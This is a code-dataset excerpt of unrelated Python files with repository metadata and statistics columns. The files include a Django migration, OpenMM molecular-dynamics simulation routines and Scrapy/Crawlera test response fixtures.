] | null | null | null |
multiworld/world/__init__.py
|
corl2019metaworld/metaworld
|
46d54644915a7d80d3f4206e2e5abe1ccbdb5393
|
[
"MIT"
] | null | null | null |
from multiworld.world.world import POMDPDescriptor
from multiworld.world.world import BaseWorld
from multiworld.world.world import World
from multiworld.world.world import ParametricWorld
| 37.6
| 50
| 0.87234
| 24
| 188
| 6.833333
| 0.291667
| 0.341463
| 0.463415
| 0.585366
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 188
| 4
| 51
| 47
| 0.953488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
54eeb30a0c5223a5881be93581ee3d266bf85509
| 2,591
|
py
|
Python
|
Instanssi/kompomaatti/migrations/0006_auto_20210511_0020.py
|
Instanssi/Instanssi.org
|
108b596c6663a3317adfe76bd537d4f05256261d
|
[
"MIT"
] | 6
|
2015-04-03T12:15:02.000Z
|
2019-05-29T07:56:11.000Z
|
Instanssi/kompomaatti/migrations/0006_auto_20210511_0020.py
|
Instanssi/Instanssi.org
|
108b596c6663a3317adfe76bd537d4f05256261d
|
[
"MIT"
] | 52
|
2015-03-04T21:15:48.000Z
|
2022-03-21T20:16:24.000Z
|
Instanssi/kompomaatti/migrations/0006_auto_20210511_0020.py
|
Instanssi/Instanssi.org
|
108b596c6663a3317adfe76bd537d4f05256261d
|
[
"MIT"
] | 6
|
2017-09-26T00:52:51.000Z
|
2020-02-17T17:24:21.000Z
|
# Generated by Django 3.2.2 on 2021-05-10 21:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('kompomaatti', '0005_entry_platform'),
]
operations = [
migrations.AlterField(
model_name='competition',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='competitionparticipation',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='compo',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='entry',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='entrycollection',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='event',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='profile',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='ticketvotecode',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='vote',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='votecoderequest',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='votegroup',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 37.550725
| 111
| 0.604014
| 259
| 2,591
| 5.864865
| 0.185328
| 0.086899
| 0.18104
| 0.210007
| 0.806452
| 0.806452
| 0.806452
| 0.806452
| 0.806452
| 0.806452
| 0
| 0.010123
| 0.275569
| 2,591
| 68
| 112
| 38.102941
| 0.799148
| 0.017368
| 0
| 0.709677
| 1
| 0
| 0.073899
| 0.009434
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016129
| 0
| 0.064516
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
54f1a39aa007557fdfed818ed2d5bb021bb90ac8
| 11,784
|
py
|
Python
|
MD_exps/MD_utils_adrp/openmm_simulation.py
|
DeepDriveMD/DeepDriveMD
|
e0837a3c3a8eb69e0068e5dec0db00a174bae325
|
[
"MIT"
] | null | null | null |
MD_exps/MD_utils_adrp/openmm_simulation.py
|
DeepDriveMD/DeepDriveMD
|
e0837a3c3a8eb69e0068e5dec0db00a174bae325
|
[
"MIT"
] | null | null | null |
MD_exps/MD_utils_adrp/openmm_simulation.py
|
DeepDriveMD/DeepDriveMD
|
e0837a3c3a8eb69e0068e5dec0db00a174bae325
|
[
"MIT"
] | 2
|
2021-08-18T13:42:32.000Z
|
2021-11-08T19:56:28.000Z
|
import os
import time
import glob
import shutil
import random
import numpy as np
import parmed as pmd
import simtk.openmm.app as app
import simtk.openmm as omm
import simtk.unit as u
from MD_utils.openmm_reporter import ContactMapReporter
from MD_utils.utils import create_md_path, touch_file
def openmm_simulate_amber_implicit(
pdb_file,
top_file=None,
check_point=None,
GPU_index=0,
output_traj="output.dcd",
output_log="output.log",
output_cm=None,
report_time=10*u.picoseconds,
sim_time=10*u.nanoseconds,
reeval_time=None,
):
"""
Start and run an OpenMM NVT simulation with Langevin integrator at 2 fs
time step and 300 K. The cutoff distance for nonbonded interactions were
set at 1.2 nm and LJ switch distance at 1.0 nm, which commonly used with
Amber force field. Long-range nonbonded interactions were handled with PME.
Parameters
----------
pdb_file : coordinates file (.gro, .pdb, ...)
This is the molecule configuration file contains all the atom position
and PBC (periodic boundary condition) box in the system.
check_point : None or check point file to load
GPU_index : Int or Str
The device # of GPU to use for running the simulation. Use Strings, '0,1'
for example, to use more than 1 GPU
output_traj : the trajectory file (.dcd)
This is the file stores all the coordinates information of the MD
simulation results.
output_log : the log file (.log)
This file stores the MD simulation status, such as steps, time, potential
energy, temperature, speed, etc.
output_cm : the h5 file contains contact map information
report_time : 10 ps
The program writes its information to the output every 10 ps by default
sim_time : 10 ns
The timespan of the simulation trajectory
"""
# set up save dir for simulation results
work_dir = os.getcwd()
time_label = int(time.time())
omm_path = create_md_path(time_label)
print(f"Running simulation at {omm_path}")
# setting up running path
os.chdir(omm_path)
if top_file:
pdb = pmd.load_file(top_file, xyz = pdb_file)
shutil.copy2(top_file, './')
system = pdb.createSystem(nonbondedMethod=app.CutoffNonPeriodic,
nonbondedCutoff=1.0*u.nanometer, constraints=app.HBonds,
implicitSolvent=app.OBC1)
else:
pdb = pmd.load_file(pdb_file)
forcefield = app.ForceField('amber99sbildn.xml', 'amber99_obc.xml')
system = forcefield.createSystem(pdb.topology,
nonbondedMethod=app.CutoffNonPeriodic,
nonbondedCutoff=1.0*u.nanometer, constraints=app.HBonds)
dt = 0.002*u.picoseconds
integrator = omm.LangevinIntegrator(300*u.kelvin, 91.0/u.picosecond, dt)
integrator.setConstraintTolerance(0.00001)
try:
platform = omm.Platform_getPlatformByName("CUDA")
properties = {'DeviceIndex': str(GPU_index), 'CudaPrecision': 'mixed'}
except Exception:
platform = omm.Platform_getPlatformByName("OpenCL")
properties = {'DeviceIndex': str(GPU_index)}
simulation = app.Simulation(pdb.topology, system, integrator, platform, properties)
if pdb.get_coordinates().shape[0] == 1:
simulation.context.setPositions(pdb.positions)
shutil.copy2(pdb_file, './')
else:
positions = random.choice(pdb.get_coordinates())
simulation.context.setPositions(positions/10)
#parmed \AA to OpenMM nm
pdb.write_pdb('start.pdb', coordinates=positions)
# equilibrate
simulation.minimizeEnergy()
simulation.context.setVelocitiesToTemperature(300*u.kelvin, random.randint(1, 10000))
simulation.step(int(100*u.picoseconds / (2*u.femtoseconds)))
# setting up reports
report_freq = int(report_time/dt)
simulation.reporters.append(app.DCDReporter(output_traj, report_freq))
if output_cm:
simulation.reporters.append(ContactMapReporter(output_cm, report_freq))
simulation.reporters.append(app.StateDataReporter(output_log,
report_freq, step=True, time=True, speed=True,
potentialEnergy=True, temperature=True, totalEnergy=True))
simulation.reporters.append(app.CheckpointReporter('checkpnt.chk', report_freq))
if check_point:
simulation.loadCheckpoint(check_point)
if reeval_time:
nsteps = int(reeval_time/dt)
niter = int(sim_time/reeval_time)
for i in range(niter):
if os.path.exists('../halt'):
return
elif os.path.exists('new_pdb'):
print("Found new.pdb, starting new sim...")
# cleaning up old runs
del simulation
# starting new simulation with new pdb
with open('new_pdb', 'r') as fp:
new_pdb = fp.read().split()[0]
os.chdir(work_dir)
openmm_simulate_amber_implicit(
new_pdb, top_file=top_file,
check_point=None,
GPU_index=GPU_index,
output_traj=output_traj,
output_log=output_log,
output_cm=output_cm,
report_time=report_time,
sim_time=sim_time,
reeval_time=reeval_time,
)
else:
simulation.step(nsteps)
else:
nsteps = int(sim_time/dt)
simulation.step(nsteps)
os.chdir(work_dir)
if not os.path.exists('../halt'):
openmm_simulate_amber_implicit(
pdb_file, top_file=top_file,
check_point=None,
GPU_index=GPU_index,
output_traj=output_traj,
output_log=output_log,
output_cm=output_cm,
report_time=report_time,
sim_time=sim_time,
reeval_time=reeval_time,
)
else:
return
def openmm_simulate_amber_explicit(
pdb_file,
top_file=None,
check_point=None,
GPU_index=0,
output_traj="output.dcd",
output_log="output.log",
output_cm=None,
report_time=10*u.picoseconds,
sim_time=10*u.nanoseconds,
reeval_time=None,
):
"""
Start and run an OpenMM NPT simulation with Langevin integrator at 2 fs
time step and 300 K. The cutoff distance for nonbonded interactions were
set at 1.0 nm, which commonly used along with Amber force field. Long-range
nonbonded interactions were handled with PME.
Parameters
----------
top_file : topology file (.top, .prmtop, ...)
This is the topology file discribe all the interactions within the MD
system.
pdb_file : coordinates file (.gro, .pdb, ...)
This is the molecule configuration file contains all the atom position
and PBC (periodic boundary condition) box in the system.
GPU_index : Int or Str
The device # of GPU to use for running the simulation. Use Strings, '0,1'
for example, to use more than 1 GPU
output_traj : the trajectory file (.dcd)
This is the file stores all the coordinates information of the MD
simulation results.
output_log : the log file (.log)
This file stores the MD simulation status, such as steps, time, potential
energy, temperature, speed, etc.
report_time : 10 ps
The program writes its information to the output every 10 ps by default
sim_time : 10 ns
The timespan of the simulation trajectory
"""
# set up save dir for simulation results
work_dir = os.getcwd()
time_label = int(time.time())
omm_path = create_md_path(time_label)
print(f"Running simulation at {omm_path}")
# setting up running path
os.chdir(omm_path)
top = pmd.load_file(top_file, xyz = pdb_file)
system = top.createSystem(nonbondedMethod=app.PME, nonbondedCutoff=1*u.nanometer,
constraints=app.HBonds)
dt = 0.002*u.picoseconds
integrator = omm.LangevinIntegrator(300*u.kelvin, 1/u.picosecond, dt)
system.addForce(omm.MonteCarloBarostat(1*u.bar, 300*u.kelvin))
try:
platform = omm.Platform_getPlatformByName("CUDA")
properties = {'DeviceIndex': str(GPU_index), 'CudaPrecision': 'mixed'}
except Exception:
platform = omm.Platform_getPlatformByName("OpenCL")
properties = {'DeviceIndex': str(GPU_index)}
simulation = app.Simulation(top.topology, system, integrator, platform, properties)
# simulation.context.setPositions(top.positions)
if top.get_coordinates().shape[0] == 1:
simulation.context.setPositions(top.positions)
shutil.copy2(pdb_file, './')
else:
positions = random.choice(top.get_coordinates())
simulation.context.setPositions(positions/10)
#parmed \AA to OpenMM nm
top.write_pdb('start.pdb', coordinates=positions)
simulation.minimizeEnergy()
simulation.context.setVelocitiesToTemperature(300*u.kelvin, random.randint(1, 10000))
simulation.step(int(100*u.picoseconds / (2*u.femtoseconds)))
report_freq = int(report_time/dt)
simulation.reporters.append(app.DCDReporter(output_traj, report_freq))
if output_cm:
simulation.reporters.append(ContactMapReporter(output_cm, report_freq))
simulation.reporters.append(app.StateDataReporter(output_log,
report_freq, step=True, time=True, speed=True,
potentialEnergy=True, temperature=True, totalEnergy=True))
simulation.reporters.append(app.CheckpointReporter('checkpnt.chk', report_freq))
if check_point:
simulation.loadCheckpoint(check_point)
nsteps = int(sim_time/dt)
simulation.step(nsteps)
if reeval_time:
nsteps = int(reeval_time/dt)
niter = int(sim_time/reeval_time)
for i in range(niter):
if os.path.exists('../halt'):
return
elif os.path.exists('new_pdb'):
print("Found new.pdb, starting new sim...")
# cleaning up old runs
del simulation
# starting new simulation with new pdb
with open('new_pdb', 'r') as fp:
new_pdb = fp.read().split()[0]
os.chdir(work_dir)
openmm_simulate_amber_explicit(
new_pdb, top_file=top_file,
check_point=None,
GPU_index=GPU_index,
output_traj=output_traj,
output_log=output_log,
output_cm=output_cm,
report_time=report_time,
sim_time=sim_time,
reeval_time=reeval_time,
)
else:
simulation.step(nsteps)
else:
nsteps = int(sim_time/dt)
simulation.step(nsteps)
os.chdir(work_dir)
if not os.path.exists('../halt'):
openmm_simulate_amber_explicit(
pdb_file, top_file=top_file,
check_point=None,
GPU_index=GPU_index,
output_traj=output_traj,
output_log=output_log,
output_cm=output_cm,
report_time=report_time,
sim_time=sim_time,
reeval_time=reeval_time,
)
else:
return
| 36.482972
| 89
| 0.617447
| 1,401
| 11,784
| 5.037116
| 0.174875
| 0.016863
| 0.025507
| 0.014454
| 0.873034
| 0.854896
| 0.844693
| 0.8386
| 0.80119
| 0.786453
| 0
| 0.014509
| 0.298116
| 11,784
| 322
| 90
| 36.596273
| 0.838714
| 0.236507
| 0
| 0.779904
| 0
| 0
| 0.046836
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009569
| false
| 0
| 0.057416
| 0
| 0.086124
| 0.019139
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07429d68a919ac500760ee0db25b77eb02246db9
| 91
|
py
|
Python
|
tools/wptserve/wptserve/logger.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
tools/wptserve/wptserve/logger.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 7,642
|
2018-05-28T09:38:03.000Z
|
2022-03-31T20:55:48.000Z
|
tools/wptserve/wptserve/logger.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
import logging
def get_logger():
# Use the root logger
return logging.getLogger()
| 15.166667
| 30
| 0.703297
| 12
| 91
| 5.25
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21978
| 91
| 5
| 31
| 18.2
| 0.887324
| 0.208791
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ab5ed83dee6de6a5cc67a07b1643606daac9d2fe
| 45
|
py
|
Python
|
test_fitacola.py
|
luismsmendonca/fitacola
|
247ae5113687c5fd457c7aa4d9464b0c83a51d9d
|
[
"MIT"
] | null | null | null |
test_fitacola.py
|
luismsmendonca/fitacola
|
247ae5113687c5fd457c7aa4d9464b0c83a51d9d
|
[
"MIT"
] | null | null | null |
test_fitacola.py
|
luismsmendonca/fitacola
|
247ae5113687c5fd457c7aa4d9464b0c83a51d9d
|
[
"MIT"
] | null | null | null |
import pytest
def test_fitacola():
pass
| 9
| 20
| 0.711111
| 6
| 45
| 5.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 45
| 4
| 21
| 11.25
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
ab629c7b9e58a241624c76517585ec0fb9868aab
| 181
|
py
|
Python
|
blog/admin.py
|
initsysctrl/mysite
|
881039f3c445e9bbc5615f9510959ca6bb2b7c18
|
[
"MIT"
] | null | null | null |
blog/admin.py
|
initsysctrl/mysite
|
881039f3c445e9bbc5615f9510959ca6bb2b7c18
|
[
"MIT"
] | null | null | null |
blog/admin.py
|
initsysctrl/mysite
|
881039f3c445e9bbc5615f9510959ca6bb2b7c18
|
[
"MIT"
] | null | null | null |
'''
Date: 2021-03-30 19:32:22
'''
# Register your models here.
from django.contrib import admin
from django.contrib import admin
from .models import Blog
admin.site.register(Blog)
| 18.1
| 32
| 0.756906
| 29
| 181
| 4.724138
| 0.62069
| 0.145985
| 0.248175
| 0.335766
| 0.437956
| 0.437956
| 0
| 0
| 0
| 0
| 0
| 0.089172
| 0.132597
| 181
| 9
| 33
| 20.111111
| 0.783439
| 0.292818
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db495fdcbe4cb231ca26dae296e9cb768de89e50
| 10,619
|
py
|
Python
|
tests/data/responses.py
|
ionut-ciubotariu/scrapy-crawlera-fetch
|
da74f91d87ac302c09a1965a8c9a6053adf9e60f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/data/responses.py
|
ionut-ciubotariu/scrapy-crawlera-fetch
|
da74f91d87ac302c09a1965a8c9a6053adf9e60f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/data/responses.py
|
ionut-ciubotariu/scrapy-crawlera-fetch
|
da74f91d87ac302c09a1965a8c9a6053adf9e60f
|
[
"BSD-3-Clause"
] | null | null | null |
from scrapy.http.request import Request
from scrapy.http.response.html import HtmlResponse
from scrapy.http.response.text import TextResponse
from tests.data import SETTINGS
from tests.utils import mocked_time
test_responses = []
test_responses.append(
{
"original": HtmlResponse(
url=SETTINGS["CRAWLERA_FETCH_URL"],
status=200,
headers={
"Content-Type": "application/json",
"Content-Encoding": "gzip",
"Transfer-Encoding": "chunked",
"Date": "Fri, 24 Apr 2020 18:06:42 GMT",
"Proxy-Connection": "close",
"Connection": "close",
},
request=Request(
SETTINGS["CRAWLERA_FETCH_URL"],
meta={
"crawlera_fetch": {
"timing": {"start_ts": mocked_time()},
"original_request": {"url": "https://fake.host.com"},
}
},
),
body=b"""{"url":"https://fake.host.com","original_status":123,"headers":{"fake-header":"true"},"body":"foobar"}""", # noqa: E501
),
"expected": TextResponse(
url="https://fake.host.com",
status=123,
headers={"Fake-Header": "true"},
body=b"""foobar""", # noqa: E501
),
}
)
test_responses.append(
{
"original": HtmlResponse(
url=SETTINGS["CRAWLERA_FETCH_URL"],
status=200,
headers={
"Content-Type": "application/json",
"Content-Encoding": "gzip",
"Transfer-Encoding": "chunked",
"Date": "Fri, 24 Apr 2020 18:06:42 GMT",
"Proxy-Connection": "close",
"Connection": "close",
},
request=Request(
SETTINGS["CRAWLERA_FETCH_URL"],
meta={
"crawlera_fetch": {
"timing": {"start_ts": mocked_time()},
"original_request": {"url": "https://httpbin.org/get"},
}
},
),
body=b"""{"url":"https://httpbin.org/get","original_status":200,"headers":{"X-Crawlera-Slave":"196.16.27.20:8800","X-Crawlera-Version":"1.43.0-","status":"200","date":"Fri, 24 Apr 2020 18:06:42 GMT","content-type":"application/json","content-length":"756","server":"gunicorn/19.9.0","access-control-allow-origin":"*","access-control-allow-credentials":"true"},"crawlera_status":"success","body_encoding":"plain","body":"<html><head></head><body><pre style=\\"word-wrap: break-word; white-space: pre-wrap;\\">{\\n \\"args\\": {}, \\n \\"headers\\": {\\n \\"Accept\\": \\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\", \\n \\"Accept-Encoding\\": \\"gzip, deflate, br\\", \\n \\"Accept-Language\\": \\"en-US,en;q=0.9\\", \\n \\"Cache-Control\\": \\"no-cache\\", \\n \\"Host\\": \\"httpbin.org\\", \\n \\"Pragma\\": \\"no-cache\\", \\n \\"Sec-Fetch-Mode\\": \\"navigate\\", \\n \\"Sec-Fetch-Site\\": \\"none\\", \\n \\"Sec-Fetch-User\\": \\"?1\\", \\n \\"Upgrade-Insecure-Requests\\": \\"1\\", \\n \\"User-Agent\\": \\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.44 Safari/537.36\\", \\n \\"X-Amzn-Trace-Id\\": \\"Root=1-5ea32ab2-93f521ee8238c744c88e3fec\\"\\n }, \\n \\"origin\\": \\"173.0.152.100\\", \\n \\"url\\": \\"https://httpbin.org/get\\"\\n}\\n</pre></body></html>"}""", # noqa: E501
),
"expected": HtmlResponse(
url="https://httpbin.org/get",
status=200,
headers={
"X-Crawlera-Slave": "196.16.27.20:8800",
"X-Crawlera-Version": "1.43.0-",
"status": "200",
"date": "Fri, 24 Apr 2020 18:06:42 GMT",
"content-type": "application/json",
"content-length": "756",
"server": "gunicorn/19.9.0",
"access-control-allow-origin": "*",
"access-control-allow-credentials": "true",
},
body=b"""<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{\n "args": {}, \n "headers": {\n "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", \n "Accept-Encoding": "gzip, deflate, br", \n "Accept-Language": "en-US,en;q=0.9", \n "Cache-Control": "no-cache", \n "Host": "httpbin.org", \n "Pragma": "no-cache", \n "Sec-Fetch-Mode": "navigate", \n "Sec-Fetch-Site": "none", \n "Sec-Fetch-User": "?1", \n "Upgrade-Insecure-Requests": "1", \n "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.44 Safari/537.36", \n "X-Amzn-Trace-Id": "Root=1-5ea32ab2-93f521ee8238c744c88e3fec"\n }, \n "origin": "173.0.152.100", \n "url": "https://httpbin.org/get"\n}\n</pre></body></html>""", # noqa: E501
),
}
)
test_responses.append(
{
"original": HtmlResponse(
url=SETTINGS["CRAWLERA_FETCH_URL"],
status=200,
headers={
"Content-Type": "application/json",
"Content-Encoding": "gzip",
"Transfer-Encoding": "chunked",
"Date": "Fri, 24 Apr 2020 18:22:10 GMT",
"Proxy-Connection": "close",
"Connection": "close",
},
request=Request(
SETTINGS["CRAWLERA_FETCH_URL"],
meta={
"crawlera_fetch": {
"timing": {"start_ts": mocked_time()},
"original_request": {"url": "https://example.org"},
}
},
),
body=b"""{"url":"https://example.org","original_status":200,"headers":{"X-Crawlera-Slave":"192.241.80.236:3128","X-Crawlera-Version":"1.43.0-","status":"200","content-encoding":"gzip","accept-ranges":"bytes","age":"108944","cache-control":"max-age=604800","content-type":"text/html; charset=UTF-8","date":"Fri, 24 Apr 2020 18:22:10 GMT","etag":"\\"3147526947\\"","expires":"Fri, 01 May 2020 18:22:10 GMT","last-modified":"Thu, 17 Oct 2019 07:18:26 GMT","server":"ECS (dab/4B85)","vary":"Accept-Encoding","content-length":"648"},"crawlera_status":"success","body_encoding":"plain","body":"<!DOCTYPE html><html><head>\\n <title>Example Domain</title>\\n\\n <meta charset=\\"utf-8\\">\\n <meta http-equiv=\\"Content-type\\" content=\\"text/html; charset=utf-8\\">\\n <meta name=\\"viewport\\" content=\\"width=device-width, initial-scale=1\\">\\n <style type=\\"text/css\\">\\n body {\\n background-color: #f0f0f2;\\n margin: 0;\\n padding: 0;\\n font-family: -apple-system, system-ui, BlinkMacSystemFont, \\"Segoe UI\\", \\"Open Sans\\", \\"Helvetica Neue\\", Helvetica, Arial, sans-serif;\\n \\n }\\n div {\\n width: 600px;\\n margin: 5em auto;\\n padding: 2em;\\n background-color: #fdfdff;\\n border-radius: 0.5em;\\n box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\\n }\\n a:link, a:visited {\\n color: #38488f;\\n text-decoration: none;\\n }\\n @media (max-width: 700px) {\\n div {\\n margin: 0 auto;\\n width: auto;\\n }\\n }\\n </style> \\n</head>\\n\\n<body>\\n<div>\\n <h1>Example Domain</h1>\\n <p>This domain is for use in illustrative examples in documents. You may use this\\n domain in literature without prior coordination or asking for permission.</p>\\n <p><a href=\\"https://www.iana.org/domains/example\\">More information...</a></p>\\n</div>\\n\\n\\n</body></html>"}""", # noqa: E501
),
"expected": HtmlResponse(
url="https://example.org",
status=200,
headers={
"X-Crawlera-Slave": "192.241.80.236:3128",
"X-Crawlera-Version": "1.43.0-",
"status": "200",
"content-encoding": "gzip",
"accept-ranges": "bytes",
"age": "108944",
"cache-control": "max-age=604800",
"content-type": "text/html; charset=UTF-8",
"date": "Fri, 24 Apr 2020 18:22:10 GMT",
"etag": '"3147526947"',
"expires": "Fri, 01 May 2020 18:22:10 GMT",
"last-modified": "Thu, 17 Oct 2019 07:18:26 GMT",
"server": "ECS (dab/4B85)",
"vary": "Accept-Encoding",
"content-length": "648",
},
body=b"""<!DOCTYPE html><html><head>\n <title>Example Domain</title>\n\n <meta charset="utf-8">\n <meta http-equiv="Content-type" content="text/html; charset=utf-8">\n <meta name="viewport" content="width=device-width, initial-scale=1">\n <style type="text/css">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 2em;\n background-color: #fdfdff;\n border-radius: 0.5em;\n box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n div {\n margin: 0 auto;\n width: auto;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.</p>\n <p><a href="https://www.iana.org/domains/example">More information...</a></p>\n</div>\n\n\n</body></html>""", # noqa: E501
),
}
)
non_processed = HtmlResponse(
url="https://example.org",
status=200,
headers={
"Content-Type": "text/html",
"Content-Encoding": "gzip",
"Transfer-Encoding": "chunked",
"Date": "Fri, 24 Apr 2020 18:06:42 GMT",
},
request=Request("https://example.org"),
body=b"""<html></html>""",
)
test_responses.append({"original": non_processed, "expected": non_processed})
| 71.268456
| 1,996
| 0.526227
| 1,293
| 10,619
| 4.290797
| 0.205723
| 0.008652
| 0.023071
| 0.017304
| 0.931507
| 0.905912
| 0.905912
| 0.875631
| 0.855443
| 0.854722
| 0
| 0.070835
| 0.26349
| 10,619
| 148
| 1,997
| 71.75
| 0.638537
| 0.006121
| 0
| 0.517731
| 0
| 0.035461
| 0.691097
| 0.142315
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035461
| 0
| 0.035461
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db64f40e7815cd43b02589b0b2cb546aff16f817
| 80
|
py
|
Python
|
spartan/model/flowscope/__init__.py
|
xyyphant0m/spartan2
|
6c40247052cdce80c2787c9ee0c5485e218c082d
|
[
"BSD-3-Clause"
] | 50
|
2020-08-24T15:21:37.000Z
|
2022-03-09T09:18:17.000Z
|
spartan/model/flowscope/__init__.py
|
xyyphant0m/spartan2
|
6c40247052cdce80c2787c9ee0c5485e218c082d
|
[
"BSD-3-Clause"
] | 16
|
2020-08-24T15:20:46.000Z
|
2021-12-20T03:13:40.000Z
|
spartan/model/flowscope/__init__.py
|
xyyphant0m/spartan2
|
6c40247052cdce80c2787c9ee0c5485e218c082d
|
[
"BSD-3-Clause"
] | 15
|
2020-08-24T15:13:16.000Z
|
2022-02-26T15:25:05.000Z
|
from .flowscopeFraudDect import FlowScope
def __call__():
return FlowScope
| 16
| 41
| 0.7875
| 8
| 80
| 7.375
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1625
| 80
| 4
| 42
| 20
| 0.880597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
